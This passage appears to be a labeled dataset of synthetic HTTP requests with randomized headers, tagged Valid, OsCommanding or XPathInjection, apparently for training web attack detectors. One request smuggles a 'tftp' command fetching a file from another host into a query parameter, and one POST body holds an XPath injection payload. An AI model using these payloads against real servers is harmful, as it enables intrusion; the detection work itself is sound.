Host: 16.179.211.200
Connection: tcsPbjga
Accept: */*
Accept-Charset: windows-1252, euc-kr;q=0.1, x-mac-hebrew;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 28.32.82.221
Cookie: rKSzrz6=srrcpdnNtsgtFd3nyv;2PB4LjRlog=rtowjm 3tbi\ tte-t;derhrw=9;eeFdkspn=440601
Cookie2: $Version="38"
Date: Sat, 26 May 07 22:27:27 UTC
ETag: "xT_GR5WTqJ8nfTuIGh2"
Expect: chdmn=EmWeh
From: stkJu@ixghnIjuI.org
If-Modified-Since: Sat, 13 Feb 10 05:49:24 UTC
If-Unmodified-Since: Mon, 25 Jan 10 20:27:57 CET
If-Match: "sVF2j0G34cod.MAqLn"
If-None-Match: "iBxn6KrEF5vf5esp"
If-Range: "oD@4DU1Kwn7t3GlaN"
Max-Forwards: 997
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM bjRvYWhzYWxxcmUwc2VhcHNvTzRvYXhoaHQ4NEFhZFRodWVJaWdsZW9zcw==
Authorization: NTLM ZXRlYXRSc3JFdnFqb0l5YWVGYU4xY2FlaDJodG50bnlzYWV5
Range: 1-60,17-538
Referer: http://www.uererq.fr/e73n/henaiya/0eculep/deoEOnei/esnnfe4.pdf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 9.5; ge-et; rv:2.7.6) Gecko/73170015
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6451x169
Via: 1.7 www.d8eo.shtml, FTP/3.7 122.46.38.77:625
Transfer-Encoding: gzip
Upgrade: u6r/6.7
Warning: 000 44.117.86.117 "8eny" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1205
Start - Id: 28384
class: Valid
GET /68gFtaSsiYt/wOzdiiZ/Iv/oR6/tlS/bOmscCA.Gn8qbhtn/qGpv/czV-_WLYtzgf0qu/dqchgmZNVGmucxK.exe?gadh2yg=7MT5aZ&Uf5RBZW@I=onie6OochbetweenO&ydvi8iNqn=htacceshavinguh&tym46twirdizsea=roe%3Dromm0a+&iwiawstu=az5Ebm&qhusga39md=0aormirennehipositionEepse%2Be&td3nmu8on=p.VCvQuzR HTTP/1.0
Host: 117.201.255.177
Connection: keep-alive
Accept: text/*, video/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 230.148.204.47
Cookie: Si=rTzs;mpFunion=mr>formsock_streamxe ib'hs[sy6f;aGz5TAnodeWq_cmd=uacceptlxh;ykp.0aVTx= j%4
Cookie2: $Version="715"
Date: Thu, 11 Feb 10 11:33:31 CET
ETag: W/"4XuG9KgXg@dZ5NSgr"
Expect: 100-continue
From: tduar@4rlra.gov
If-Modified-Since: Sun, 03 Jun 07 08:12:04 GMT
If-Unmodified-Since: Fri, 02 Jun 06 21:43:48 UTC
If-Match: "K.QYIoFxjPb-S-D"
If-None-Match: "i_n1dzhyKWOLizG"
If-Range: "PT4uvT4Rt5lPHl8P0"
Max-Forwards: 14
MIME-Version: 5.5
Pragma: pEooigie='c'
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: ejouB wzccOa=edsedbd
Range: 665026-
Referer: http://eadeat.st/8sesr02R/cgfata.avi
TE: gzip;q=0.1,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 2.8; xt-th; rv:5.1.4) Gecko/90094360
UA-CPU: StrongARM
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 965x809
Via: 8.1 59.32.203.8, FTP/7.7 www.TyFds.html, 9.4 104.17.142.68
Transfer-Encoding: ip7r
Upgrade: sy6/9.0, Aea/8.3
Warning: 400 www.5ytrzae7.gif "nwouaqlicrdcwyfeiOy" 
X-Forwarded-For: 112.8.23.251
X-Serial-Number: 7465297368
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28384
Start - Id: 7361
class: Valid
PUT /shAh9oee3ges/byrugxactenhpeeseoi4/tCQVT_Y@yi8FHPs/micV_i.elpab4lMOTE6/dHk/andcTtmp/poLce2ntethebrShIrig/tZcgqwIKe1ZUTZh/SndmHearAb/vOYS/1atiroiS/e@0fV.pl? HTTP/1.0
Content-Length: 227
Content-Language: ieoeeda
Content-Encoding: gzip
Content-Location: /3hso8eAe/lnsmt/rasib/ycbu.jpg
Content-MD5: ZXU0Um1haVNIc254b2hJbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 22:24:20 CET
Last-Modified: Thu, 19 Oct 06 07:34:17 CET
Host: 65.6.217.219
Connection: close
Accept: audio/*, image/gif
Accept-Charset: windows-1253, windows-1255;q=0.7, windows-1252, x-mac-roman;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: Likmhetr='dIaet'
Client-ip: 40.118.223.19
Cookie: 7nsiPe9yhch=45;h6ee8Miimaba=ncaw3osmijn
Cookie2: $Version="532"
Date: Fri, 23 Jun 06 21:40:43 CET
ETag: "4n1OEXxdHpCrGn1"
Expect: 100-continue
From: toboche@ata6xsirt.st
If-Modified-Since: Tue, 20 Oct 09 12:58:47 UTC
If-Unmodified-Since: Mon, 10 Mar 08 20:23:04 CET
If-Match: "MlSThO9xB1D5ejuohb-V"
If-None-Match: *
If-Range: *
Max-Forwards: 017
MIME-Version: 3.6
Pragma: 5tel1uBe=onll
Proxy-Authorization: NTLM ZWVzYThlc2ljcnR6YmdzMG50ZTNjdXA5b2V3bmVqcnR5
Authorization: Basic bG1od2R3bDpuRDd0bQ==
Range: -38,928255-,664-
Referer: /at2E/ijmns/lolj/8iataro/nnau5.cfm
TE: trailers,deflate
Trailer: User-Agent
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 5.0; mm-sn; rv:6.9.7) Gecko/62317671
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 850x401
Via: HTTP/5.4 129.57.42.198
Transfer-Encoding: gzip
Upgrade: heer/1.8, hjiO/5.4, eAtc/2.6, eotk/8.4
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 199.98.82.192
X-Serial-Number: 33978029627174385263
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

audns8nmk=senpoltreinvbscript9xtermf&szn1MIWSm=re1et&uciaciu=m2uomeaswhsdsseyh&lsm7unjeerait=Gysaeswwh&e8o=piAHm&ose01roiSh=51464&jruohhg0u3eiY=537116&positionatggYpAxQ=s3Al&otdnlnaduo=tcopyrpymN2a|2Emzadmin&rb9causmDi3f=soN 

End - Id: 7361
Start - Id: 2988
class: Valid
GET /nthj2amnr5lead3/zuiV2H-j/rteqon88lnP0ee/Oj0ftebsmTfcn/yD46T@R/rD7bJGhYi@d-6d1EGt/iMPOdQ0JQwiy/n4Tiktuttcfoeem/eralyzndaanAyp1li/sJMyUrdvf-JDgcX.pl? HTTP/1.1
Host: www.maoy.cz:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: osersLda-rtsPts, a-e9;q=0.8, 8t-Nee7e
Cache-Control: no-cache
Client-ip: 10.142.110.57
Cookie: ufgtxpcosixs=3lcei;Nobi4pl=n9KzbZcEl0Si
Cookie2: $Version="6"
Date: Mon, 26 Jun 06 17:40:54 CET
ETag: "o942pdQXoL4kHmnt"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Wed, 05 May 04 08:39:38 UTC
If-Unmodified-Since: Sun, 12 Nov 06 17:50:33 CET
If-Match: "YtbN0rI5QqnyAKnSlzs"
If-None-Match: *
If-Range: Fri, 20 May 05 21:05:07 CET
Max-Forwards: 5
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ls7i.fr/ag7sO/0eoi.nsf
Authorization: s7a85 rusa=ws16ho5
Range: 91188-
Referer: http://www.uUcdpIs.biz/naja2/ersomIu.tiff
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 1.7; nx-aw; rv:5.5.4) Gecko/61109901
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4979x0191
Via: FTP/3.2 179.166.200.22, 4svais/5.5 59.250.237.178, FTP/8.1 211.139.181.19
Transfer-Encoding: 0ennca
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2988
Start - Id: 8785
class: Valid
GET /aiIeat5pou/pK3/aeoOFV.@/sX/VW0Pi8nLpKJ/macNMu1gjNJUY8erx.s/eNityPGiu29/bhlaaekoNmzdDdg/uu2CY_5Sn1JP4i/hrZ1x.nsf? HTTP/1.0
Host: www.whnOIei8fi.gov
Connection: close
Accept: video/mpeg, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 184.38.170.151
Cookie: 3winput6xp_Samabin0=5paEnnpsaonce;n0mtieiae=ealhe>aoal;ssr5aemiohgeyc=Brhised0iIt4qhe
Cookie2: $Version="11"
Date: Fri, 09 Jun 06 01:51:26 CET
ETag: "fce7_Rvgq32my2N"
Expect: 100-continue
From: nq5rma@oelceseNaa.org
If-Modified-Since: Sun, 28 Mar 10 19:05:00 CET
If-Unmodified-Since: Wed, 09 Feb 05 18:13:29 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 1.9
Pragma: 9ndr2reu='1iy'
Proxy-Authorization: Basic aXRzaWU6ZGxlZA==
Authorization: pawe 6alr5=Q92eoe
Range: 348876-,-8,27-
Referer: http://www.otbao.st/nheb5s.rar
TE: chunked,deflate;q=0.0
Trailer: Accept
User-Agent: hZdWq4N http://www.nyni.uk
UA-CPU: 68000
UA-Disp: 735,9558,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 633x2304
Via: 7.1 145.222.190.69, HTTP/6.2 25.249.61.161, OisRn/1.2 40.124.80.139
Transfer-Encoding: gzip
Upgrade: neRhr/6.8, es1/9.5, srnw/7.1
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8785
Start - Id: 18238
class: Valid
GET /tT/NloerssnTosyw4dfesi/T0UYE2t.jpg? HTTP/1.1
Host: 215.111.208.194
Connection: keep-alive
Accept: video/*;q=0.7, text/*
Accept-Charset: iso-8859-3, big5;q=0.6, iso-8859-5;q=0.0
Accept-Encoding: 
Accept-Language: t-Wmsw1a, s8-atwhoo
Cache-Control: no-cache
Client-ip: 12.11.189.0
Cookie: it=bmochagiolibbeltHhudp;2ct@metaaHwinntbgsound=wde1nebodyjunionro;afdtE2=:sacdu;inputxml8RxKupdateD9=llvWyt6vhe;feKeauemL=o kee
Cookie2: $Version="362"
Date: Fri, 23 Feb 07 14:49:06 UTC
ETag: "uT-742IaNri6aR6wUur"
Expect: o29hinWi=snxpo
From: hdyWf@e1t0unenyl.ch
If-Modified-Since: Wed, 20 Jul 05 14:49:06 CET
If-Unmodified-Since: Tue, 12 Sep 06 10:40:37 UTC
If-Match: "7vpFgDrBDGcRrW19B"
If-None-Match: *
If-Range: Mon, 06 Apr 09 18:19:45 UTC
Max-Forwards: 071
MIME-Version: 0.2
Pragma: niicc=flh8u
Proxy-Authorization: Basic dGV0OGVkazp0aW9scQ==
Authorization: mioat Fk4tze=ASmSorrl
Range: 41-16
Referer: /tigw/wste.sh
TE: trailers,gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/6.3 (X11; U; SunOS sun4u 2.2; a1-rt; rv:9.1.6) Gecko/56922069
UA-CPU: PowerPC
UA-Disp: 713,1321,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1021x3555
Via: FTP/4.3 www.ahrn.jpeg, 9.7 211.28.246.164, 6.5 35.127.145.61:99910
Transfer-Encoding: identity
Upgrade: oeEul/3.4, B6ened/3.9, oRoC/0.7
Warning: 763 212.227.140.5:8348 "gddLcd3eaoscn8iho" 
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 50068
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18238
Start - Id: 21438
class: Valid
GET /hdu/kz1hk/dehnrnraofrr4ncelF/k.oAUE/v7i/PvjizMB/hIQs1I_tvfzhfhoAU/nnidtw/szkMFg5xAiJ7xBwEE/o7Vexec/oW3_8KbMy-bTb4xwax.msf? HTTP/1.0
Host: 22.142.145.21
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 184.231.194.80
Cookie: voloa=t09Z7gl4;uceereutidn7o=eKaXb-hYi;WVlvpGEdCwinnt=proq
Cookie2: $Version="7"
Date: Thu, 22 Nov 07 10:50:25 UTC
ETag: W/"bDwWByaxg1jNbaMw"
Expect: 100-continue
From: unnd4yhe@pnsUaeitiH.biz
If-Modified-Since: Sun, 15 Jan 06 24:52:52 GMT
If-Unmodified-Since: Fri, 28 May 04 22:24:38 UTC
If-Match: "mYaCTm7-Myv5oUu5"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 2.5
Pragma: 4nIlGn='16rAio'
Proxy-Authorization: Digest response="Ac6eaF266Ca7B70FE5920F1FE64EFBf3"
Authorization: Basic d3I0ZXRuOk5lbFJo
Range: -5794,717335-,08-
Referer: http://dsOctid6.com/p7hn/Gr0r/nu2zet21/e6ric7th.exe
TE: trailers,trailers,deflate;q=0.7
Trailer: Accept-Encoding
User-Agent: Mozilla/8.6 (compatible; Konqueror/8.5; SunOS sun4u; kdftsoeLd1; dninxoral)
UA-CPU: Sparc
UA-Disp: 839,365,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 528x4272
Via: 3.8 15.27.85.208, FTP/0.6 253.160.176.141, FTP/2.9 www.SsrdaaE.css
Transfer-Encoding: identity
Upgrade: nDnsno/7.5, s4ef/9.2, 6L4/6.6
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 074187220
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21438
Start - Id: 44598
class: OsCommanding
GET /eABG/we/loSala2anbuta/ampiPvhKfT/F8F.js?ig1o=234.116.194.206++%3B++tftp+192.168.10.33+test.txt HTTP/1.1
Host: 111.156.157.168:80
Connection: keep-alive
Accept: text/*, application/postscript;q=0.3
Accept-Charset: x-mac-greek, windows-1252;q=0.5, x-mac-arabic, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: rdm-m, lh-Erli2
Cache-Control: 4oi7n=Isgelei
Client-ip: 97.130.78.86
Cookie: ci=47291;eratrvli=nfh0z.g9GPO;tn0=os3tiedttMsseaw;pstg2js5iutsu=910;winnttMJlf=uiq mopt
Cookie2: $Version="67"
Date: Thu, 15 Jun 06 04:18:59 UTC
ETag: W/"EceresNnukYMbJqcg@"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 31 Oct 09 05:38:24 UTC
If-Unmodified-Since: Sun, 04 Feb 07 14:56:24 GMT
If-Match: *
If-None-Match: "a77IGwIzKiU4Q3YYEu"
If-Range: Tue, 06 Apr 04 14:46:39 GMT
Max-Forwards: 0069
MIME-Version: 1.7
Pragma: dmpst='nohhosV'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: iendrI etxinE=oeBI
Range: 7-3,62874-04
Referer: http://www.irTfii.be/lwfElz/clrieo/lmyaOgt/nn3l.sh
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/7.5 (compatible; Konqueror/0.1; Win98; aspMsns)
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/9.5 68.76.61.172, 5.6 www.nsegt6e.js:7485, HTTP/0.3 7.75.37.69
Transfer-Encoding: identity
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 099 188.171.255.136 "sresnpusmMne" "Wed, 01 Apr 09 06:36:17 GMT"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44598
Start - Id: 321
class: Valid
GET /bztoptwindow.open4/bPboot.initp_5l/u2ceiaccsjii/pstdinULvMfBG/t8RoJGH4/i3taepwmfaa/qPWM.yDxrnG7RMb.MS.nsf?9TvuC1D-W=v&sock_streamozinFDxmlAduTc=4aBxde HTTP/1.0
Host: 110.2.200.93
Connection: smn6i
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 91.136.93.17
Cookie: iex=58460828;Jhiphpof3Qcopy=ds1ciju+bchildle;dnsaes6oibez=nadeHmrsrjrnti;7nmg=3eael;s2sm=eopted
Cookie2: $Version="25"
Date: Mon, 01 May 06 12:05:25 GMT
ETag: W/"iwoQ954Ux3XociSacO"
Expect: 100-continue
From: ruf6nI@0Dnp.be
If-Modified-Since: Wed, 24 May 06 14:10:44 CET
If-Unmodified-Since: Sun, 30 Oct 05 10:57:42 CET
If-Match: *
If-None-Match: "atGTlOmVTH6LI4YbOzT8"
If-Range: Thu, 31 Jan 08 15:04:01 UTC
Max-Forwards: 3927
MIME-Version: 0.8
Pragma: snb2dwr=een
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Digest cnonce="lrlmlld"
Range: -628836,202688-,60495-
Referer: http://www.TIbqw.com/9Lsf5/s1wiSs/lhahdmuh/tuiac.png
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (X11; U; Solaris 7.2; fI-ta; rv:3.3.8) Gecko/46202518
UA-CPU: PowerPC
UA-Disp: 4131,3258,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 537x415
Via: 3.8 www.uhon.shtml, 5.2 84.73.46.58, 8.4 www.ecnev.html
Transfer-Encoding: gzip
Upgrade: hgrhtf/9.9
Warning: 525 237.102.27.124 "s17tooevait4Le" 
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 321
Start - Id: 20938
class: Valid
GET /2aOwd/em1nociar3ssucB/rxtoauFlLH/gh/oabio81o/f13-wCZbrc5n3kvck0Lk/jINIT/cTeh/O.bineX0X5X.tiff?Eiu=9&mlelvtl=dSC&wten=-%5Dtlr&h7=1&sQ6YBahnodecW=d3enhfioauaw&gasl0se9apns7a=9&snoae5toifw=pda&et1prdoWdgysntb=aiirfznsswyZetetHi&gildnulEet=emYrAIU7TT&o2iaoRcebtyi=6lae HTTP/1.0
Host: 201.109.26.32
Connection: thteDi
Accept: application/x-tar, text/xml, text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, gzip, deflate, compress, compress
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 176.75.134.165
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="195"
Date: Sat, 24 Mar 07 13:11:48 GMT
ETag: W/"@SwYjNEfjZMf_Kh4ulGE"
Expect: sbmyjz=nf9bml;nyae
From: d011d@jsutlttae.it
If-Modified-Since: Sat, 09 Jan 10 21:42:27 UTC
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: "fuzcjQOvwRlxBHarH1"
If-None-Match: "aJSqmGDbyd5Kq95NA6k"
If-Range: "_ltRZ4Orx.c4zq-uNrJ"
Max-Forwards: 27
MIME-Version: 3.1
Pragma: 4beUae=tz7f
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Basic VlN6ZWRscm46aGV3bmVj
Range: 8-0,694610-
Referer: /fesstM/htt87nrc/worlno/oei2n/awer.doc
TE: chunked;q=0.7,gzip;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.9 (X11; U; Unix 4.2; ts-rs; rv:6.3.3) Gecko/37677220
UA-CPU: x86
UA-Disp: 0973,375,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 308x307
Via: FTP/2.2 www.i41kehrn.jpg
Transfer-Encoding: deflate
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20938
Start - Id: 10207
class: Valid
GET /arey4nhttmlagl/bHCzmCC6/neeeiroai3s7ta0s/ud6Z9hbVC.73PxzTM/eO8Frq1J/hsNTvKmWyscVp.php3?i8sleiNrte=dkooiyn8i&rea=chnmd&ew9mrb=swgetlr-v+a&whyeefNsgeele=17thlh%3Dca4teih HTTP/1.0
Host: 33.115.212.229:80
Connection: trRkE
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: rTzymON-oej;q=0.6, 79i-mog9tn;q=0.9, hs-Eg;q=0.7
Cache-Control: no-store
Client-ip: 68.209.209.228
Cookie: bTaTus0ied2rcd=Oeinsertzohghsolc
Cookie2: $Version="59"
Date: Thu, 02 Aug 07 24:19:16 UTC
ETag: "Div0-MtcnHnCyom9avp@"
Expect: 100-continue
From: Ihr6E@hiaxciCr.gov
If-Modified-Since: Sun, 08 Mar 09 12:57:09 GMT
If-Unmodified-Since: Fri, 02 Feb 07 07:40:15 CET
If-Match: "F@QLBkF4rNcIY4RS-2R"
If-None-Match: *
If-Range: "KC3MZidXBTtvTTTv1"
Max-Forwards: 9065
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bG9leGlSbnBrdWVuMVhoZXJtMGR4blNlbHRlbHdsYXRpMHNocmlvZDlwZG52em8=
Authorization: Digest realm
Range: 984-,23-,72-
Referer: /pnle7Is/iEh93n3s/hhrfgha/e8lacElm/isl5hie.jpg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: igpfz11 http://www.h6Ei.be
UA-CPU: 68000
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: FTP/6.5 www.ti1o14.gif
Transfer-Encoding: deflate
Upgrade: ce2fw/5.5
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10207
Start - Id: 48689
class: XPathInjection
POST /JOEs./aeOgnr/nevtSMtHttohiEr/dhW0b/VKjAdHTT8X/owhereuD/nlwget/zliEtZVDaK0/tRsrSR_roJX0a/94/td.jsp? HTTP/1.0
Content-Length: 362
Content-Language: peha9lm1,h,eUdeenhs
Content-Encoding: deflate
Content-Location: http://hbrheat.ch/ueth8/jcxhsa/eersz/nRshoaZ4/cigwa.cfm
Content-MD5: TWc4ZnlzZ2VsdHd0NG9pNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Apr 05 13:37:22 CET
Host: 137.232.231.238:9667
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.5, iso-8859-5;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 235.129.193.205
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Thu, 04 Mar 10 14:43:18 GMT
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
If-Modified-Since: Tue, 27 Dec 05 08:50:23 GMT
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: *
If-None-Match: "df9IpsfP7SmcfOrD"
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 58
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: NTLM bnNoRVdpV3Nyb3RoNnJiY2FvaXB5aXNzQnR5bmV0cE53YXNhMHJrcGlhcWl1cA==
Referer: /scyxmtel/atsuNdl/n0etnEiu/zsewlne.js
Trailer: Accept
User-Agent: dfrsEfBfpa (iCXQ_K; l8Nhtb; aXI14ZfqqX; eLEaHo2)
UA-Disp: 5095,3013,8
UA-Color: color16
UA-Pixels: 640x9904
Via: 1.5 142.129.111.195, HTTP/4.8 248.219.139.127, FTP/0.4 65.51.212.154
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
X-Serial-Number: 3185085450816900238
----: ------------------------

4ioiektOnn4nphi=3625934&libu19fcnJpT=tctl&erao=ouN4ze&qsmxsa=eosexec%4aml?tr&gccr=nvcsednamp&54cllm=snesoRe&cehhis957Rltrae=iaoee&aizn8ci=5  or    count(path/child::node()[position()=((i+j+k+l+1)] | path/child::*()[position()=(k+1)])=1 or   5054=&enxhtleeNnE=3732762299&0childD7=nllsiaase

End - Id: 48689
Start - Id: 15054
class: Valid
GET /MWGBV@ir1BW2/sUslQ7rqYRGuvq89/ef0S2CHah/eleT83ther/Udxdronsol/Rjh/fz/aDs3-C/cewx.jzlZLQi0J/oV/NsamsHr6.9.cgi?esurGRteise=qlE35Wq&mnh=%29n&chieKCfreladb9=1%40-59i6xzISM&tnUeie8asE0=zf7formobject21feoeeim&yXvJBn6@=ixk.e7TF7wzL&a9nelbI3R=1&fObwam=pannid1os7syy%3Em%5D%26 HTTP/1.0
Host: www.ieaatu.com
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-kr, big5
Accept-Encoding: 
Accept-Language: 0e7cenaa-m, 6i-uet, yt8ha-ontua;q=0.7, ha-t;q=0.2, 8se-1retJI
Cache-Control: en='albenas6'
Client-ip: 222.250.250.163
Cookie: Er4se=3lrrO hsaahc
Cookie2: $Version="897"
Date: Wed, 15 Sep 04 23:42:40 UTC
ETag: "@_esZrV1r5HoOv6_8"
Expect: 100-continue
From: NBko@ilcocf4eu.ch
If-Modified-Since: Wed, 22 Mar 06 23:24:58 CET
If-Unmodified-Since: Thu, 22 Apr 04 07:43:26 UTC
If-Match: *
If-None-Match: "81XbDQ_jJ08yLyUA9rVf"
If-Range: "79gSEXHSMY8qjBmS"
Max-Forwards: 6
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest username="ttnditw"
Authorization: Basic ZXRsZXRub3I6dHRibmc=
Range: 4-,-3,94-
Referer: http://eiyr.uk/N5eolunj.txt
TE: trailers,deflate;q=0.7,chunked
Trailer: Via
User-Agent: gBNkmOH.jB http://www.ritn.it
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7618x6392
Via: tIeel1/7.5 www.fhlld.htm, 8.4 www.Ehrdc8Se.htm, 0.5 201.155.80.163
Transfer-Encoding: deflate
Upgrade: raA/4.1, led/0.8, Sna/5.8, aie/5.1, ipm/0.5
Warning: 670 120.59.241.81 "srredysdrtssiTT" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 618402796
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15054
Start - Id: 32668
class: Valid
POST /ncS.Vahlb_.LXywNAD/trc/tewxFari/d3ON@qyhJO1SV/l3K/zpcUhnolnTd2geyogy/urqi0/eYURXeKTJ2.jx.bin? HTTP/1.1
Content-Length: 57
Content-Language: gnSi3N
Content-Encoding: deflate
Content-Location: http://difog.biz/7dtiaet/roIehm7m/dsce9vtj/ukpvr.txt
Content-MD5: ZWVBbWV0Z3JlcUdkdDRBMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 23:12:42 GMT
Last-Modified: Tue, 08 Dec 09 04:24:26 GMT
Host: 56.120.153.200:98
Connection: close
Accept: application/rtf;q=0.4, audio/*;q=0.9, text/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 10.48.181.22
Cookie: vBB6ipe=tKGPVR9ua;umutmnaegnorrca=8;is=w2WsmTt;MOe6ruetLm=5;62lfXD=systemm
Cookie2: $Version="426"
Date: Sat, 28 May 05 24:05:53 UTC
ETag: "I6MtFUKXXzTLqRYsHf4"
Expect: neaOien=ntat;lx0OdGsr=aojsvz9
From: lhr7mem@aapi.biz
If-Modified-Since: Sat, 11 Nov 06 08:40:39 CET
If-Unmodified-Since: Sun, 13 Aug 06 23:17:04 CET
If-Match: *
If-None-Match: "rKJwXbUdsZ54U4Es"
If-Range: "so7PKmc-IyEwd6G5p"
Max-Forwards: 1616
MIME-Version: 8.7
Pragma: tahqiytn=t53
